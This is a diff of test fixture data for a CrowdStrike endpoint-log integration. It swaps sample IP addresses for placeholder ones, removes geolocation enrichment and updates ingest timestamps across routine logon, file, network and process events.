@@ -7913,19 +6926,19 @@ "user.name" ], "hosts": [ - "208.216.134.211", + "67.43.156.13", "srv2" ], "hash": [ "3950066843" ], "ip": [ - "208.216.134.211" + "67.43.156.13" ] }, "event": { - "ingested": "2021-11-22T09:23:55.466038700Z", - "original": "{\"AuthenticationId\":\"317005428\",\"AuthenticationPackage\":\"Negotiate\",\"ConfigBuild\":\"1007.3.0011603.1\",\"ConfigStateHash\":\"3950066843\",\"EffectiveTransmissionClass\":\"2\",\"Entitlements\":\"15\",\"LogoffTime\":\"1604855132.756\",\"LogonDomain\":\"dom1\",\"LogonServer\":\"srv2\",\"LogonTime\":\"1604855131.666\",\"LogonType\":\"7\",\"PasswordLastSet\":\"1598119332.510\",\"RemoteAccount\":\"1\",\"UserFlags\":\"32\",\"UserIsAdmin\":\"0\",\"UserLogoffType\":\"3\",\"UserLogonFlags\":\"0\",\"UserName\":\"user4\",\"UserPrincipal\":\"user.name@dom2.com\",\"UserSid\":\"S-1-5-21-606747145-1364589140-725345543-28636\",\"aid\":\"ffffffffe0104823bd3de859d5bc8bc7\",\"aip\":\"208.216.134.211\",\"cid\":\"ffffffff30a3407dae27d0503611022d\",\"event_platform\":\"Win\",\"event_simpleName\":\"UserLogoff\",\"id\":\"ffffffff-1111-11eb-8913-0287fd11c79b\",\"name\":\"UserLogoffV3\",\"timestamp\":\"1604855134461\"}", + "ingested": "2021-12-09T13:36:11.151143Z", + "original": 
"{\"AuthenticationId\":\"317005428\",\"AuthenticationPackage\":\"Negotiate\",\"ConfigBuild\":\"1007.3.0011603.1\",\"ConfigStateHash\":\"3950066843\",\"EffectiveTransmissionClass\":\"2\",\"Entitlements\":\"15\",\"LogoffTime\":\"1604855132.756\",\"LogonDomain\":\"dom1\",\"LogonServer\":\"srv2\",\"LogonTime\":\"1604855131.666\",\"LogonType\":\"7\",\"PasswordLastSet\":\"1598119332.510\",\"RemoteAccount\":\"1\",\"UserFlags\":\"32\",\"UserIsAdmin\":\"0\",\"UserLogoffType\":\"3\",\"UserLogonFlags\":\"0\",\"UserName\":\"user4\",\"UserPrincipal\":\"user.name@dom2.com\",\"UserSid\":\"S-1-5-21-606747145-1364589140-725345543-28636\",\"aid\":\"ffffffffe0104823bd3de859d5bc8bc7\",\"aip\":\"67.43.156.13\",\"cid\":\"ffffffff30a3407dae27d0503611022d\",\"event_platform\":\"Win\",\"event_simpleName\":\"UserLogoff\",\"id\":\"ffffffff-1111-11eb-8913-0287fd11c79b\",\"name\":\"UserLogoffV3\",\"timestamp\":\"1604855134461\"}", "created": "2020-11-08T17:05:34.461Z", "kind": "event", "action": "UserLogoff", @@ -7982,21 +6995,12 @@ "preserve_original_event" ], "observer": { - "geo": { - "continent_name": "North America", - "country_name": "United States", - "location": { - "lon": -97.822, - "lat": 37.751 - }, - "country_iso_code": "US" - }, - "address": "208.216.150.192", - "vendor": "crowdstrike", - "ip": "208.216.150.192", "serial_number": "ffffffff425942f58382dbb11350eeda", + "address": "67.43.156.13", "type": "agent", - "version": "1007.3.0011603.1" + "version": "1007.3.0011603.1", + "vendor": "crowdstrike", + "ip": "67.43.156.13" }, "@timestamp": "2020-11-08T17:03:45.966Z", "file": { 
@@ -8012,18 +7016,18 @@ }, "related": { "hosts": [ - "208.216.150.192" + "67.43.156.13" ], "hash": [ "537307300" ], "ip": [ - "208.216.150.192" + "67.43.156.13" ] }, "event": { - "ingested": "2021-11-22T09:23:55.466045400Z", - "original": "{\"ConfigBuild\":\"1007.3.0011603.1\",\"ConfigStateHash\":\"537307300\",\"ContextProcessId\":\"635780922149\",\"ContextThreadId\":\"9479299143023\",\"ContextTimeStamp\":\"1604855025.966\",\"DesiredAccess\":\"1180054\",\"EffectiveTransmissionClass\":\"3\",\"Entitlements\":\"15\",\"FileAttributes\":\"128\",\"FileIdentifier\":\"0e02a8c7ed9d244887cef0409af0e6190030000000001100\",\"FileObject\":\"18446695174291796544\",\"Information\":\"2\",\"IrpFlags\":\"2180\",\"MajorFunction\":\"0\",\"MinorFunction\":\"0\",\"OperationFlags\":\"0\",\"Options\":\"83886176\",\"ShareAccess\":\"3\",\"Status\":\"0\",\"TargetFileName\":\"\\\\Device\\\\HarddiskVolume4\\\\Program Files\\\\Snow Software\\\\Inventory\\\\Agent\\\\cloudmeteringhost.exe\",\"aid\":\"ffffffff425942f58382dbb11350eeda\",\"aip\":\"208.216.150.192\",\"cid\":\"ffffffff30a3407dae27d0503611022d\",\"event_platform\":\"Win\",\"event_simpleName\":\"NewExecutableWritten\",\"id\":\"ffffffff-1111-11eb-93cb-067deb43537b\",\"name\":\"NewExecutableWrittenV1\",\"timestamp\":\"1604855149643\"}", + "ingested": "2021-12-09T13:36:11.151149300Z", + "original": 
"{\"ConfigBuild\":\"1007.3.0011603.1\",\"ConfigStateHash\":\"537307300\",\"ContextProcessId\":\"635780922149\",\"ContextThreadId\":\"9479299143023\",\"ContextTimeStamp\":\"1604855025.966\",\"DesiredAccess\":\"1180054\",\"EffectiveTransmissionClass\":\"3\",\"Entitlements\":\"15\",\"FileAttributes\":\"128\",\"FileIdentifier\":\"0e02a8c7ed9d244887cef0409af0e6190030000000001100\",\"FileObject\":\"18446695174291796544\",\"Information\":\"2\",\"IrpFlags\":\"2180\",\"MajorFunction\":\"0\",\"MinorFunction\":\"0\",\"OperationFlags\":\"0\",\"Options\":\"83886176\",\"ShareAccess\":\"3\",\"Status\":\"0\",\"TargetFileName\":\"\\\\Device\\\\HarddiskVolume4\\\\Program Files\\\\Snow Software\\\\Inventory\\\\Agent\\\\cloudmeteringhost.exe\",\"aid\":\"ffffffff425942f58382dbb11350eeda\",\"aip\":\"67.43.156.13\",\"cid\":\"ffffffff30a3407dae27d0503611022d\",\"event_platform\":\"Win\",\"event_simpleName\":\"NewExecutableWritten\",\"id\":\"ffffffff-1111-11eb-93cb-067deb43537b\",\"name\":\"NewExecutableWrittenV1\",\"timestamp\":\"1604855149643\"}", "created": "2020-11-08T17:05:49.643Z", "kind": "event", "action": "NewExecutableWritten", @@ -8087,21 +7091,12 @@ "direction": "unknown" }, "observer": { - "geo": { - "continent_name": "North America", - "country_name": "United States", - "location": { - "lon": -97.822, - "lat": 37.751 - }, - "country_iso_code": "US" - }, - "address": "208.222.216.124", - "vendor": "crowdstrike", - "ip": "208.222.216.124", "serial_number": "ffffffffa51b4acf9dbc1fc273e6145c", + "address": "67.43.156.14", "type": "agent", - "version": "1007.3.0011603.1" + "version": "1007.3.0011603.1", + "vendor": "crowdstrike", + "ip": "67.43.156.14" }, "@timestamp": "2020-11-08T17:05:50.066Z", "ecs": { @@ -8109,7 +7104,7 @@ }, "related": { "hosts": [ - "208.222.216.124", + "67.43.156.14", "127.0.0.1", "0.0.0.0" ], 
@@ -8117,14 +7112,14 @@ "3765958535" ], "ip": [ - "208.222.216.124", + "67.43.156.14", "127.0.0.1", "0.0.0.0" ] }, "event": { - "ingested": "2021-11-22T09:23:55.466052100Z", - "original": "{\"ConfigBuild\":\"1007.3.0011603.1\",\"ConfigStateHash\":\"3765958535\",\"ConnectionDirection\":\"2\",\"ConnectionFlags\":\"0\",\"ContextProcessId\":\"50714198593318\",\"ContextThreadId\":\"194302491825207\",\"ContextTimeStamp\":\"1604855150.066\",\"EffectiveTransmissionClass\":\"3\",\"Entitlements\":\"15\",\"InContext\":\"0\",\"LocalAddressIP4\":\"127.0.0.1\",\"LocalPort\":\"59491\",\"Protocol\":\"6\",\"RemoteAddressIP4\":\"0.0.0.0\",\"RemotePort\":\"0\",\"aid\":\"ffffffffa51b4acf9dbc1fc273e6145c\",\"aip\":\"208.222.216.124\",\"cid\":\"ffffffff30a3407dae27d0503611022d\",\"event_platform\":\"Win\",\"event_simpleName\":\"NetworkListenIP4\",\"id\":\"ffffffff-1111-11eb-8726-063418e4a9e7\",\"name\":\"NetworkListenIP4V5\",\"timestamp\":\"1604855150545\"}", + "ingested": "2021-12-09T13:36:11.151155600Z", + "original": "{\"ConfigBuild\":\"1007.3.0011603.1\",\"ConfigStateHash\":\"3765958535\",\"ConnectionDirection\":\"2\",\"ConnectionFlags\":\"0\",\"ContextProcessId\":\"50714198593318\",\"ContextThreadId\":\"194302491825207\",\"ContextTimeStamp\":\"1604855150.066\",\"EffectiveTransmissionClass\":\"3\",\"Entitlements\":\"15\",\"InContext\":\"0\",\"LocalAddressIP4\":\"127.0.0.1\",\"LocalPort\":\"59491\",\"Protocol\":\"6\",\"RemoteAddressIP4\":\"0.0.0.0\",\"RemotePort\":\"0\",\"aid\":\"ffffffffa51b4acf9dbc1fc273e6145c\",\"aip\":\"67.43.156.14\",\"cid\":\"ffffffff30a3407dae27d0503611022d\",\"event_platform\":\"Win\",\"event_simpleName\":\"NetworkListenIP4\",\"id\":\"ffffffff-1111-11eb-8726-063418e4a9e7\",\"name\":\"NetworkListenIP4V5\",\"timestamp\":\"1604855150545\"}", "created": "2020-11-08T17:05:50.545Z", "kind": "event", "action": "NetworkListenIP4", 
@@ -8159,26 +7154,8 @@
 "type": "windows"
 },
 "destination": {
- "geo": {
- "continent_name": "North America",
- "region_iso_code": "US-IN",
- "city_name": "Auburn",
- "country_iso_code": "US",
- "country_name": "United States",
- "region_name": "Indiana",
- "location": {
- "lon": -85.0497,
- "lat": 41.3569
- }
- },
- "as": {
- "number": 14140,
- "organization": {
- "name": "Auburn Essential Services"
- }
- },
- "address": "208.80.28.100",
- "ip": "208.80.28.100"
+ "address": "67.43.156.14",
+ "ip": "67.43.156.14"
 },
 "url": {
 "scheme": "http"
@@ -8187,21 +7164,12 @@
 "preserve_original_event"
 ],
 "observer": {
- "geo": {
- "continent_name": "North America",
- "country_name": "United States",
- "location": {
- "lon": -97.822,
- "lat": 37.751
- },
- "country_iso_code": "US"
- },
- "address": "208.216.128.255",
- "vendor": "crowdstrike",
- "ip": "208.216.128.255",
 "serial_number": "ffffffffd8844a59acce5e1f4ad01888",
+ "address": "67.43.156.13",
 "type": "agent",
- "version": "1007.3.0011603.1"
+ "version": "1007.3.0011603.1",
+ "vendor": "crowdstrike",
+ "ip": "67.43.156.13"
 },
 "@timestamp": "2020-11-08T17:05:52.993Z",
 "ecs": {
@@ -8212,21 +7180,21 @@ "user5" ], "hosts": [ - "208.216.128.255", - "208.80.28.100", + "67.43.156.13", + "67.43.156.14", "com1" ], "hash": [ "3011122681" ], "ip": [ - "208.216.128.255", - "208.80.28.100" + "67.43.156.13", + "67.43.156.14" ] }, "event": { - "ingested": "2021-11-22T09:23:55.466058700Z", - "original": "{\"ClientComputerName\":\"com1\",\"ConfigBuild\":\"1007.3.0011603.1\",\"ConfigStateHash\":\"3011122681\",\"ContextProcessId\":\"7073822473144\",\"ContextThreadId\":\"48689911139327\",\"ContextTimeStamp\":\"1604855152.993\",\"EffectiveTransmissionClass\":\"2\",\"Entitlements\":\"15\",\"EtwRawProcessId\":\"744\",\"EtwRawThreadId\":\"5304\",\"LogonDomain\":\"BROADCAST\",\"LogonType\":\"3\",\"RemoteAddressIP4\":\"208.80.28.100\",\"Status\":\"3221225581\",\"SubStatus\":\"3221225578\",\"UserName\":\"user5\",\"aid\":\"ffffffffd8844a59acce5e1f4ad01888\",\"aip\":\"208.216.128.255\",\"cid\":\"ffffffff30a3407dae27d0503611022d\",\"event_platform\":\"Win\",\"event_simpleName\":\"UserLogonFailed2\",\"id\":\"ffffffff-1111-11eb-a8aa-067029dffccb\",\"name\":\"UserLogonFailed2V2\",\"timestamp\":\"1604855154274\"}", + "ingested": "2021-12-09T13:36:11.151161900Z", + "original": "{\"ClientComputerName\":\"com1\",\"ConfigBuild\":\"1007.3.0011603.1\",\"ConfigStateHash\":\"3011122681\",\"ContextProcessId\":\"7073822473144\",\"ContextThreadId\":\"48689911139327\",\"ContextTimeStamp\":\"1604855152.993\",\"EffectiveTransmissionClass\":\"2\",\"Entitlements\":\"15\",\"EtwRawProcessId\":\"744\",\"EtwRawThreadId\":\"5304\",\"LogonDomain\":\"BROADCAST\",\"LogonType\":\"3\",\"RemoteAddressIP4\":\"67.43.156.14\",\"Status\":\"3221225581\",\"SubStatus\":\"3221225578\",\"UserName\":\"user5\",\"aid\":\"ffffffffd8844a59acce5e1f4ad01888\",\"aip\":\"67.43.156.13\",\"cid\":\"ffffffff30a3407dae27d0503611022d\",\"event_platform\":\"Win\",\"event_simpleName\":\"UserLogonFailed2\",\"id\":\"ffffffff-1111-11eb-a8aa-067029dffccb\",\"name\":\"UserLogonFailed2V2\",\"timestamp\":\"1604855154274\"}", 
"created": "2020-11-08T17:05:54.274Z",
 "kind": "event",
 "action": "UserLogonFailed2",
@@ -8273,21 +7241,12 @@
 "preserve_original_event"
 ],
 "observer": {
- "geo": {
- "continent_name": "North America",
- "country_name": "United States",
- "location": {
- "lon": -97.822,
- "lat": 37.751
- },
- "country_iso_code": "US"
- },
- "address": "208.216.150.195",
- "vendor": "crowdstrike",
- "ip": "208.216.150.195",
 "serial_number": "ffffffff4a0946365161093453e596d4",
+ "address": "67.43.156.13",
 "type": "agent",
- "version": "1007.3.0011603.1"
+ "version": "1007.3.0011603.1",
+ "vendor": "crowdstrike",
+ "ip": "67.43.156.13"
 },
 "@timestamp": "2020-11-08T17:05:51.534Z",
 "file": {
@@ -8303,18 +7262,18 @@ }, "related": { "hosts": [ - "208.216.150.195" + "67.43.156.13" ], "hash": [ "3343111420" ], "ip": [ - "208.216.150.195" + "67.43.156.13" ] }, "event": { - "ingested": "2021-11-22T09:23:55.466065400Z", - "original": "{\"ConfigBuild\":\"1007.3.0011603.1\",\"ConfigStateHash\":\"3343111420\",\"ContextProcessId\":\"1838383212125\",\"ContextThreadId\":\"27242382481217\",\"ContextTimeStamp\":\"1604855151.534\",\"EffectiveTransmissionClass\":\"3\",\"Entitlements\":\"15\",\"FileIdentifier\":\"b0754a8f86feffffb0754a8f86feffff09764a8f86feffff\",\"FileObject\":\"18446636884348143072\",\"IrpFlags\":\"1028\",\"MajorFunction\":\"18\",\"MinorFunction\":\"0\",\"OperationFlags\":\"0\",\"TargetFileName\":\"\\\\Device\\\\HarddiskVolume3\\\\Program Files\\\\WindowsApps\\\\Deleted\\\\Microsoft.Getstarted_9.10.32461.0_x64__8wekyb3d8bbweacf6b996-01b3-402c-bd01-a67529f94699\\\\clrcompression.dll\",\"aid\":\"ffffffff4a0946365161093453e596d4\",\"aip\":\"208.216.150.195\",\"cid\":\"ffffffff30a3407dae27d0503611022d\",\"event_platform\":\"Win\",\"event_simpleName\":\"ExecutableDeleted\",\"id\":\"ffffffff-1111-11eb-b23b-064dea059649\",\"name\":\"ExecutableDeletedV3\",\"timestamp\":\"1604855154670\"}", + "ingested": "2021-12-09T13:36:11.151168200Z", + "original": "{\"ConfigBuild\":\"1007.3.0011603.1\",\"ConfigStateHash\":\"3343111420\",\"ContextProcessId\":\"1838383212125\",\"ContextThreadId\":\"27242382481217\",\"ContextTimeStamp\":\"1604855151.534\",\"EffectiveTransmissionClass\":\"3\",\"Entitlements\":\"15\",\"FileIdentifier\":\"b0754a8f86feffffb0754a8f86feffff09764a8f86feffff\",\"FileObject\":\"18446636884348143072\",\"IrpFlags\":\"1028\",\"MajorFunction\":\"18\",\"MinorFunction\":\"0\",\"OperationFlags\":\"0\",\"TargetFileName\":\"\\\\Device\\\\HarddiskVolume3\\\\Program 
Files\\\\WindowsApps\\\\Deleted\\\\Microsoft.Getstarted_9.10.32461.0_x64__8wekyb3d8bbweacf6b996-01b3-402c-bd01-a67529f94699\\\\clrcompression.dll\",\"aid\":\"ffffffff4a0946365161093453e596d4\",\"aip\":\"67.43.156.13\",\"cid\":\"ffffffff30a3407dae27d0503611022d\",\"event_platform\":\"Win\",\"event_simpleName\":\"ExecutableDeleted\",\"id\":\"ffffffff-1111-11eb-b23b-064dea059649\",\"name\":\"ExecutableDeletedV3\",\"timestamp\":\"1604855154670\"}", "created": "2020-11-08T17:05:54.670Z", "kind": "event", "action": "ExecutableDeleted", @@ -8361,21 +7320,12 @@ "preserve_original_event" ], "observer": { - "geo": { - "continent_name": "North America", - "country_name": "United States", - "location": { - "lon": -97.822, - "lat": 37.751 - }, - "country_iso_code": "US" - }, - "address": "208.173.124.176", - "vendor": "crowdstrike", - "ip": "208.173.124.176", "serial_number": "ffffffffcfe84e8c6a52c4001bd83761", + "address": "67.43.156.13", "type": "agent", - "version": "1007.4.0009202.1" + "version": "1007.4.0009202.1", + "vendor": "crowdstrike", + "ip": "67.43.156.13" }, "@timestamp": "2020-11-08T17:05:35.209Z", "ecs": { 
@@ -8383,19 +7333,19 @@ }, "related": { "hosts": [ - "208.173.124.176" + "67.43.156.13" ], "hash": [ "295fbc2356e8605e804f95cb6d6f992335e247dbf11767fe8781e2a7f889978a", "230795414" ], "ip": [ - "208.173.124.176" + "67.43.156.13" ] }, "event": { - "ingested": "2021-11-22T09:23:55.466072200Z", - "original": "{\"AsepWrittenCount\":\"0\",\"ConfigBuild\":\"1007.4.0009202.1\",\"ConfigStateHash\":\"230795414\",\"ContextProcessId\":\"318137549555284836\",\"ContextThreadId\":\"0\",\"ContextTimeStamp\":\"1604855135.209\",\"DirectoryCreatedCount\":\"0\",\"DnsRequestCount\":\"0\",\"Entitlements\":\"15\",\"ExecutableDeletedCount\":\"0\",\"FileDeletedCount\":\"0\",\"NetworkBindCount\":\"0\",\"NetworkCapableAsepWriteCount\":\"0\",\"NetworkCloseCount\":\"0\",\"NetworkConnectCount\":\"0\",\"NetworkListenCount\":\"0\",\"NetworkRecvAcceptCount\":\"0\",\"NewExecutableWrittenCount\":\"0\",\"RawProcessId\":\"20195\",\"SHA256HashData\":\"295fbc2356e8605e804f95cb6d6f992335e247dbf11767fe8781e2a7f889978a\",\"SuspectStackCount\":\"0\",\"SuspiciousDnsRequestCount\":\"0\",\"TargetProcessId\":\"318137549555284836\",\"aid\":\"ffffffffcfe84e8c6a52c4001bd83761\",\"aip\":\"208.173.124.176\",\"cid\":\"ffffffff30a3407dae27d0503611022d\",\"event_platform\":\"Mac\",\"event_simpleName\":\"EndOfProcess\",\"id\":\"ffffffff-1111-11eb-ae31-065d76bec0c3\",\"name\":\"EndOfProcessMacV11\",\"timestamp\":\"1604855160047\"}", + "ingested": "2021-12-09T13:36:11.151174600Z", + "original": 
"{\"AsepWrittenCount\":\"0\",\"ConfigBuild\":\"1007.4.0009202.1\",\"ConfigStateHash\":\"230795414\",\"ContextProcessId\":\"318137549555284836\",\"ContextThreadId\":\"0\",\"ContextTimeStamp\":\"1604855135.209\",\"DirectoryCreatedCount\":\"0\",\"DnsRequestCount\":\"0\",\"Entitlements\":\"15\",\"ExecutableDeletedCount\":\"0\",\"FileDeletedCount\":\"0\",\"NetworkBindCount\":\"0\",\"NetworkCapableAsepWriteCount\":\"0\",\"NetworkCloseCount\":\"0\",\"NetworkConnectCount\":\"0\",\"NetworkListenCount\":\"0\",\"NetworkRecvAcceptCount\":\"0\",\"NewExecutableWrittenCount\":\"0\",\"RawProcessId\":\"20195\",\"SHA256HashData\":\"295fbc2356e8605e804f95cb6d6f992335e247dbf11767fe8781e2a7f889978a\",\"SuspectStackCount\":\"0\",\"SuspiciousDnsRequestCount\":\"0\",\"TargetProcessId\":\"318137549555284836\",\"aid\":\"ffffffffcfe84e8c6a52c4001bd83761\",\"aip\":\"67.43.156.13\",\"cid\":\"ffffffff30a3407dae27d0503611022d\",\"event_platform\":\"Mac\",\"event_simpleName\":\"EndOfProcess\",\"id\":\"ffffffff-1111-11eb-ae31-065d76bec0c3\",\"name\":\"EndOfProcessMacV11\",\"timestamp\":\"1604855160047\"}", "created": "2020-11-08T17:06:00.047Z", "kind": "event", "action": "EndOfProcess", @@ -8448,21 +7398,12 @@ "preserve_original_event" ], "observer": { - "geo": { - "continent_name": "North America", - "country_name": "United States", - "location": { - "lon": -97.822, - "lat": 37.751 - }, - "country_iso_code": "US" - }, - "address": "208.24.76.36", - "vendor": "crowdstrike", - "ip": "208.24.76.36", "serial_number": "ffffffff80984ea8b49d9a53f590c566", + "address": "67.43.156.14", "type": "agent", - "version": "1007.3.0011603.1" + "version": "1007.3.0011603.1", + "vendor": "crowdstrike", + "ip": "67.43.156.14" }, "@timestamp": "2020-11-08T17:06:11.731Z", "ecs": { 
@@ -8470,18 +7411,18 @@ }, "related": { "hosts": [ - "208.24.76.36" + "67.43.156.14" ], "hash": [ "3338885535" ], "ip": [ - "208.24.76.36" + "67.43.156.14" ] }, "event": { - "ingested": "2021-11-22T09:23:55.466078900Z", - "original": "{\"ApiReturnValue\":\"1\",\"ConfigBuild\":\"1007.3.0011603.1\",\"ConfigStateHash\":\"3338885535\",\"ContextProcessId\":\"683078218537\",\"ContextTimeStamp\":\"1604855171.731\",\"EffectiveTransmissionClass\":\"3\",\"Entitlements\":\"15\",\"EtwRawProcessId\":\"19400\",\"EtwRawThreadId\":\"9384\",\"aid\":\"ffffffff80984ea8b49d9a53f590c566\",\"aip\":\"208.24.76.36\",\"cid\":\"ffffffff30a3407dae27d0503611022d\",\"event_platform\":\"Win\",\"event_simpleName\":\"RegisterRawInputDevicesEtw\",\"id\":\"ffffffff-1111-11eb-a570-0685ba2a382f\",\"name\":\"RegisterRawInputDevicesEtwV1\",\"timestamp\":\"1604855173077\"}", + "ingested": "2021-12-09T13:36:11.151181Z", + "original": "{\"ApiReturnValue\":\"1\",\"ConfigBuild\":\"1007.3.0011603.1\",\"ConfigStateHash\":\"3338885535\",\"ContextProcessId\":\"683078218537\",\"ContextTimeStamp\":\"1604855171.731\",\"EffectiveTransmissionClass\":\"3\",\"Entitlements\":\"15\",\"EtwRawProcessId\":\"19400\",\"EtwRawThreadId\":\"9384\",\"aid\":\"ffffffff80984ea8b49d9a53f590c566\",\"aip\":\"67.43.156.14\",\"cid\":\"ffffffff30a3407dae27d0503611022d\",\"event_platform\":\"Win\",\"event_simpleName\":\"RegisterRawInputDevicesEtw\",\"id\":\"ffffffff-1111-11eb-a570-0685ba2a382f\",\"name\":\"RegisterRawInputDevicesEtwV1\",\"timestamp\":\"1604855173077\"}", "created": "2020-11-08T17:06:13.077Z", "kind": "event", "action": "RegisterRawInputDevicesEtw", 
@@ -8525,25 +7466,16 @@ "domain": "lfodown01-b.cloudsink.net", "subdomain": "lfodown01-b" }, - "tags": [ - "preserve_original_event" - ], - "observer": { - "geo": { - "continent_name": "North America", - "country_name": "United States", - "location": { - "lon": -97.822, - "lat": 37.751 - }, - "country_iso_code": "US" - }, - "address": "208.64.212.186", - "vendor": "crowdstrike", - "ip": "208.64.212.186", + "tags": [ + "preserve_original_event" + ], + "observer": { "serial_number": "ffffffffffc94c645268f64fc900213f", + "address": "67.43.156.14", "type": "agent", - "version": "1007.3.0011603.1" + "version": "1007.3.0011603.1", + "vendor": "crowdstrike", + "ip": "67.43.156.14" }, "@timestamp": "2020-11-08T17:06:14.018Z", "file": { 
@@ -8555,18 +7487,18 @@ }, "related": { "hosts": [ - "208.64.212.186" + "67.43.156.14" ], "hash": [ "3338885535" ], "ip": [ - "208.64.212.186" + "67.43.156.14" ] }, "event": { - "ingested": "2021-11-22T09:23:55.466085600Z", - "original": "{\"CompletionEventId\":\"Event_ChannelDataDownloadCompleteV1\",\"ConfigBuild\":\"1007.3.0011603.1\",\"ConfigStateHash\":\"3338885535\",\"DownloadPath\":\"metahash+/cfs/channelfiles/0000000013/b2acba1a30a3407dae27d0503611022d/C-00000013-00000000-00000408.sys\",\"DownloadPort\":\"443\",\"DownloadServer\":\"lfodown01-b.cloudsink.net\",\"EffectiveTransmissionClass\":\"0\",\"Entitlements\":\"15\",\"TargetFileName\":\"C-00000013-00000000-00000408.sys\",\"aid\":\"ffffffffffc94c645268f64fc900213f\",\"aip\":\"208.64.212.186\",\"cid\":\"ffffffff30a3407dae27d0503611022d\",\"event_platform\":\"Win\",\"event_simpleName\":\"LFODownloadConfirmation\",\"id\":\"ffffffff-1111-11eb-8ab5-0643392fc75d\",\"name\":\"LFODownloadConfirmationV1\",\"timestamp\":\"1604855174018\"}", + "ingested": "2021-12-09T13:36:11.151187300Z", + "original": "{\"CompletionEventId\":\"Event_ChannelDataDownloadCompleteV1\",\"ConfigBuild\":\"1007.3.0011603.1\",\"ConfigStateHash\":\"3338885535\",\"DownloadPath\":\"metahash+/cfs/channelfiles/0000000013/b2acba1a30a3407dae27d0503611022d/C-00000013-00000000-00000408.sys\",\"DownloadPort\":\"443\",\"DownloadServer\":\"lfodown01-b.cloudsink.net\",\"EffectiveTransmissionClass\":\"0\",\"Entitlements\":\"15\",\"TargetFileName\":\"C-00000013-00000000-00000408.sys\",\"aid\":\"ffffffffffc94c645268f64fc900213f\",\"aip\":\"67.43.156.14\",\"cid\":\"ffffffff30a3407dae27d0503611022d\",\"event_platform\":\"Win\",\"event_simpleName\":\"LFODownloadConfirmation\",\"id\":\"ffffffff-1111-11eb-8ab5-0643392fc75d\",\"name\":\"LFODownloadConfirmationV1\",\"timestamp\":\"1604855174018\"}", "created": "2020-11-08T17:06:14.018Z", "kind": "event", "action": "LFODownloadConfirmation", 
@@ -8606,24 +7538,12 @@ "preserve_original_event" ], "observer": { - "geo": { - "continent_name": "North America", - "region_iso_code": "US-NY", - "city_name": "Albany", - "country_iso_code": "US", - "country_name": "United States", - "region_name": "New York", - "location": { - "lon": -73.8207, - "lat": 42.7198 - } - }, - "address": "208.105.150.175", - "vendor": "crowdstrike", - "ip": "208.105.150.175", "serial_number": "ffffffff280b41b956a91e816bd9b9b0", + "address": "67.43.156.14", "type": "agent", - "version": "1007.3.0011603.1" + "version": "1007.3.0011603.1", + "vendor": "crowdstrike", + "ip": "67.43.156.14" }, "@timestamp": "2020-11-08T17:05:46.590Z", "file": { 
@@ -8639,18 +7559,18 @@ }, "related": { "hosts": [ - "208.105.150.175" + "67.43.156.14" ], "hash": [ "1763245019" ], "ip": [ - "208.105.150.175" + "67.43.156.14" ] }, "event": { - "ingested": "2021-11-22T09:23:55.466092400Z", - "original": "{\"ConfigBuild\":\"1007.3.0011603.1\",\"ConfigStateHash\":\"1763245019\",\"ContextProcessId\":\"2071361595421\",\"ContextThreadId\":\"41650430047375\",\"ContextTimeStamp\":\"1604855146.590\",\"EffectiveTransmissionClass\":\"3\",\"Entitlements\":\"15\",\"FileIdentifier\":\"4b0121a43dfc1f4ca54eea679ddbcd4eef2103000000ca00\",\"FileObject\":\"18446622606546437424\",\"IrpFlags\":\"395312\",\"MajorFunction\":\"6\",\"MinorFunction\":\"0\",\"NewFileIdentifier\":\"4b0121a43dfc1f4ca54eea679ddbcd4eef2103000000ca00\",\"OperationFlags\":\"0\",\"SourceFileName\":\"\\\\Device\\\\HarddiskVolume3\\\\Windows\\\\assembly\\\\temp\\\\EKA0UARWWK\\\\Microsoft.WSMan.Management.ni.dll\",\"TargetFileName\":\"\\\\Device\\\\HarddiskVolume3\\\\Windows\\\\assembly\\\\NativeImages_v4.0.30319_64\\\\Microsoft.We0722664#\\\\c2579d00f9849413b8b7948dd00ac863\\\\Microsoft.WSMan.Management.ni.dll\",\"aid\":\"ffffffff280b41b956a91e816bd9b9b0\",\"aip\":\"208.105.150.175\",\"cid\":\"ffffffff30a3407dae27d0503611022d\",\"event_platform\":\"Win\",\"event_simpleName\":\"NewExecutableRenamed\",\"id\":\"ffffffff-1111-11eb-8162-0663305b686f\",\"name\":\"NewExecutableRenamedV6\",\"timestamp\":\"1604855177513\"}", + "ingested": "2021-12-09T13:36:11.151193600Z", + "original": 
"{\"ConfigBuild\":\"1007.3.0011603.1\",\"ConfigStateHash\":\"1763245019\",\"ContextProcessId\":\"2071361595421\",\"ContextThreadId\":\"41650430047375\",\"ContextTimeStamp\":\"1604855146.590\",\"EffectiveTransmissionClass\":\"3\",\"Entitlements\":\"15\",\"FileIdentifier\":\"4b0121a43dfc1f4ca54eea679ddbcd4eef2103000000ca00\",\"FileObject\":\"18446622606546437424\",\"IrpFlags\":\"395312\",\"MajorFunction\":\"6\",\"MinorFunction\":\"0\",\"NewFileIdentifier\":\"4b0121a43dfc1f4ca54eea679ddbcd4eef2103000000ca00\",\"OperationFlags\":\"0\",\"SourceFileName\":\"\\\\Device\\\\HarddiskVolume3\\\\Windows\\\\assembly\\\\temp\\\\EKA0UARWWK\\\\Microsoft.WSMan.Management.ni.dll\",\"TargetFileName\":\"\\\\Device\\\\HarddiskVolume3\\\\Windows\\\\assembly\\\\NativeImages_v4.0.30319_64\\\\Microsoft.We0722664#\\\\c2579d00f9849413b8b7948dd00ac863\\\\Microsoft.WSMan.Management.ni.dll\",\"aid\":\"ffffffff280b41b956a91e816bd9b9b0\",\"aip\":\"67.43.156.14\",\"cid\":\"ffffffff30a3407dae27d0503611022d\",\"event_platform\":\"Win\",\"event_simpleName\":\"NewExecutableRenamed\",\"id\":\"ffffffff-1111-11eb-8162-0663305b686f\",\"name\":\"NewExecutableRenamedV6\",\"timestamp\":\"1604855177513\"}", "created": "2020-11-08T17:06:17.513Z", "kind": "event", "action": "NewExecutableRenamed", @@ -8695,21 +7615,12 @@ "preserve_original_event" ], "observer": { - "geo": { - "continent_name": "North America", - "country_name": "United States", - "location": { - "lon": -97.822, - "lat": 37.751 - }, - "country_iso_code": "US" - }, - "address": "208.216.128.255", - "vendor": "crowdstrike", - "ip": "208.216.128.255", "serial_number": "ffffffff2c9f4066b0b5f2f00265503c", + "address": "67.43.156.13", "type": "agent", - "version": "1007.3.0011603.1" + "version": "1007.3.0011603.1", + "vendor": "crowdstrike", + "ip": "67.43.156.13" }, "@timestamp": "2020-11-08T17:06:05.213Z", "file": { 
